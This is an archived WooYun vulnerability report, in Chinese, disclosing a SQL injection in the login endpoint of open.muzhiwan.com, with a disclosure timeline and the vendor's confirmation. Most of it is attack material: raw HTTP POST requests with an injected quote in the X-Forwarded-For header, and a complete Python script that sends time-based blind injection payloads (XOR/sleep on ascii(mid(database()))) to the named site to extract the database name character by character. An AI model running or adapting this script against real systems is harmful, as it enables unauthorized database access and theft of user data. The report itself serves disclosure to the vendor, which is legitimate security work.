乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-04: 细节已通知厂商并且等待厂商处理中 2016-01-05: 厂商已经确认,细节仅向厂商公开 2016-01-15: 细节向核心白帽子及相关领域专家公开 2016-01-25: 细节向普通白帽子公开 2016-02-04: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
(づ ̄ 3 ̄)づ
和这个洞是同一站点 WooYun: 拇指玩一处SQL注入可控制千万用户数据
POST /?action=public&opt=check_username HTTP/1.1Host: open.muzhiwan.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://open.muzhiwan.com/?action=public&opt=loginContent-Length: 13Cookie: PHPSESSID=86etm3velh28pgfdint4e3tvb2X-Forwarded-For: 127.0.0.1'Connection: keep-aliveaccount=admin
上面的 account 参数有过滤,而下面这个post中的 account 就没有过滤,╮(╯▽╰)╭
POST /?action=public&opt=loginin HTTP/1.1Host: open.muzhiwan.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://open.muzhiwan.com/?action=public&opt=loginContent-Length: 43Cookie: PHPSESSID=86etm3velh28pgfdint4e3tvb2X-Forwarded-For: 127.0.0.1'Connection: keep-aliveaccount=admin&password=111111111&remember=1
附脚本
#!/usr/bin/python# -*- coding: UTF-8 -*-import httplibimport timeimport stringimport sysimport randomimport urllibimport mathheaders = {'Content-Type':'application/x-www-form-urlencoded'}payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'print 'Starting to retrive MySQL DB:'db= ''for i in range(1, 4): for payload in payloads: s = "account=admin'XOR(if(now()=sysdate(),sleep(if(ascii(mid(database(),%s,1))=%s,5,0)),0))OR'&password=111111111&remember=1" % (i, ord(payload)) conn = httplib.HTTPConnection('open.muzhiwan.com', timeout=60) conn.request(method='POST', url='/?action=public&opt=loginin', body=s, headers=headers) start_time = time.time() conn.getresponse() conn.close() print '.', if time.time() - start_time > 5.0: db += payload print '\n\n[In progress]', db, breakprint '\n\n[Done] MySQL DB is %s' % db
过滤
危害等级:高
漏洞Rank:20
确认时间:2016-01-05 10:09
你好,我们会尽快修复
暂无